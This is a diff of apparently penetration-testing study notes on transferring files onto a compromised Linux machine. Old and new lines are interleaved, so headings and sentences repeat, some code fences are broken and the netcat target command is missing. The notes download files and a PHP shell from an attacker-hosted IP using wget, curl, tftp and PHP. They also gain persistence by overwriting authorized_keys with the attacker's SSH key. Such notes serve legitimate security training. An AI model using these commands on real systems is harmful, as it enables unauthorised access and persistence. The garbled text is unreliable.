Update transfering_files.md

# Transfering files

# Transferring Files on Linux

### Set up av simple python webserver

## Set Up a Simple Python Webserver

For the examples using curl  and wget we need to download from a web-server. THis is an easy way to set up a web-server. This command will make the entire folder available on port 9999.

python -m SimpleHTTPServer 9999

```

### Wget

## Wget

Now you can download any file with curl or wget

```

wget 192.168.1.102:9999/file.txt

```

### Curl

## Curl

```

curl -O http://192.168.0.101/file.txt

```

### Netcat

Another easy way is to use netcat. 

## Netcat

Another easy way to transfer files is by using netcat.

If you can't have an interactive shell it might be risky to start listening on a on a port, since it could be that the attacking-machine is unable to connect. So you are left hanging and can't do ctr-c because  that will destroy your sessions.

So instead you can connect from the target machine like this.

On attacking machine:

```bash

nc -lvp 4444 < file

```

On target machine:

```bash

```

### With php

## With php

```

echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php

```

### Ftp

## Ftp

If you have access to a ftp-client to can of course just use that. 

### Tftp

## Tftp

On some rare machine we do not have access to nc and wget, and curl.. But we might have access to tftp. Some versions of tftp are run interactivly, like this:

On some rare machine we do not have access to nc and wget, and curl.. But we might have access to tftp. Some versions of tftp are run interactively, like this:

```

$ tftp 192.168.0.101

tftp> get myfile.txt

```

If we can't run it interactivly, for whatever reason, we can  do this trick:

If we can't run it interactively, for whatever reason, we can  do this trick:

```

tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"

```

### SSH

### SSH - SCP

If you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.

So, in the /home/user dir you can find the hidden `.ssh` files by typing `ls -la`.

Then you need to do two things.

1. Create a new keypair.

1. Create a new keypair

You do that with: 

```

ssh-keygen -t rsa -C "your_email@example.com"

Enter file in which to save the key (/root/.ssh/id_rsa): nameOfMyKey

Enter passphrase (empty for no passphrase): 

Enter same passphrase again: `

Enter same passphrase again:

This will create two files, one called *nameOfMyKey* and another called *nameOfMyKey_pub*. The one with the *_pub* is of course your public key. And the other key is your private.

This will create two files, one called **nameOfMyKey** and another called **nameOfMyKey_pub**. The one with the *_pub* is of course your public key. And the other key is your private.

2. Add your public key to authorized_keys.

Now you copy the content of *nameOfMyKey_pub*. 

Now you copy the content of **nameOfMyKey_pub**. 

On the compromised machine you go to `~/.ssh` and then run add the public key to the file authorized_keys. Like this 

```

```bash

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keys

```

ssh -i nameOfMyKey kim@192.168.1.103

```

### SCP

Now we can copy files to a machine using **scp**

```

# Copy a file:

$ scp /path/to/source/file.ext username@192.168.1.101:/path/to/destination/file.ext

# Copy a directory:

$ scp -r /path/to/source/dir username@192.168.1.101:/path/to/destination

```

 No newline at end of file